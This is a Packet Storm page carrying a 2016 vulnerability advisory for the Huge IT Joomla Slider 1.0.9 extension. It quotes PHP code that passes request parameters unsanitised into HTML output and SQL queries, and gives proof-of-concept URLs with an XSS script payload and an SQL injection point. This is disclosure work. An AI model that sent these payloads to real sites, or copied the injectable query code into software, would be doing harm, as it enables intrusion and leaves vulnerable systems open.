what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Huge IT Joomla Slider 1.0.9 XSS / SQL Injection

Huge IT Joomla Slider 1.0.9 XSS / SQL Injection
Posted Jul 27, 2016
Authored by Larry W. Cashdollar

Huge IT Joomla Slider extension version 1.0.9 suffers from cross site scripting and remote SQL injection vulnerabilities.

tags | exploit, remote, vulnerability, xss, sql injection
advisories | CVE-2016-1000121, CVE-2016-1000122
SHA-256 | 4de2f91b2188085d1b161495281b6932b70d1cec9be6d62cde8cfe1b2ce6aa59

Huge IT Joomla Slider 1.0.9 XSS / SQL Injection

Change Mirror Download
Title: Reflected XSS and SQLi in Huge IT Joomla Slider v1.0.9 extension
Author: Larry W. Cashdollar, @_larry0
Date: 2016-07-22
Download Site: http://extensions.joomla.org/extensions/extension/photos-a-images/slider
Vendor: huge-it.com
Vendor Notified: 2016-07-22
Vendor Contact:
Description: Huge-IT Slider extension is one of the powerful products that our company offer. It gives style and charm to your site and help to attract the attention of visitors to certain parts of the content.
Vulnerability:
The attacker must be logged in with at least manager level access or access to the administrative panel to exploit this vulnerability.

XSS in ./admin/views/slider/tmpl/default.php via id variable:
275: <a class="modal" rel="{handler: 'iframe', size: {x: 800, y: 500}}" href="index.php?option=com_slider&view=video&tmpl=component&pid=<?php echo $_GET['id']; ?>" title="Video" >

SQL Injection in the following sections of code:

in file ./admin/models/slider.php
53: $id_cat = JRequest::getVar('id');
54- $query = $db->getQuery(true);
55- $query->select('#__huge_itslider_images.name as name,'
56- . '#__huge_itslider_images.id ,'
57- . '#__huge_itslider_sliders.name as portName,'
58- . 'slider_id, #__huge_itslider_images.description as description,image_url,sl_url,sl_type,link_target,#__huge_itslider_images.ordering,#__huge_itslider_images.published,published_in_sl_width');
--
69: $id_cat = JRequest::getVar('id');
70- $query = $db->getQuery(true);
71- $query->select('*');
72- $query->from('#__huge_itslider_images');
73- $query->where('slider_id=' . $id_cat);
74- $db->setQuery($query);
--
117: $id_cat = JRequest::getVar('id');
118-
119- $query = $db->getQuery(true);
120- $query->update('#__huge_itslider_sliders')->set('name ="' . $name . '"')
121- ->set('sl_height="' . $sl_height . '"')->set('slider_list_effects_s="' . $slider_effects_list . '"')
122- ->set('pause_on_hover="' . $pause_on_hover . '"')
--
133: $id_cat = JRequest::getVar('id');
134- $query = $db->getQuery(true);
135- $query->update('#__huge_itslider_sliders')->set('slider_list_effects_s ="' . $styleName . '"')->where('id="' . $id_cat . '"');
136- $db->setQuery($query);
137- $db->execute();
138- }
--
182: $id_cat = JRequest::getVar('removeslide');
183: $id = JRequest::getVar('id');
184- $db = JFactory::getDBO();
185- $query = $db->getQuery(true);
186- $query->delete('#__huge_itslider_images')->where('id =' . $id_cat);
187- $db->setQuery($query);
188- $db->execute();

CVE-2016-1000121 XSS
CVE-2016-1000122 SQLi
JSON: Export
Exploit Code:
aC/ XSS:
aC/
aC/ http://192.168.0.125/administrator/index.php?option=com_slider&view=slider&id=1%20--%20%22%3E%3Cscript%3Ealert(1);%3C/script%3E
aC/
aC/ SQLi:
aC/
aC/ http://192.168.0.125/administrator/index.php?option=com_slider&view=slider&id=HERE

Advisory: http://www.vapidlabs.com/advisory.php?v=168
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    8 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    11 Files
  • 23
    Apr 23rd
    68 Files
  • 24
    Apr 24th
    23 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close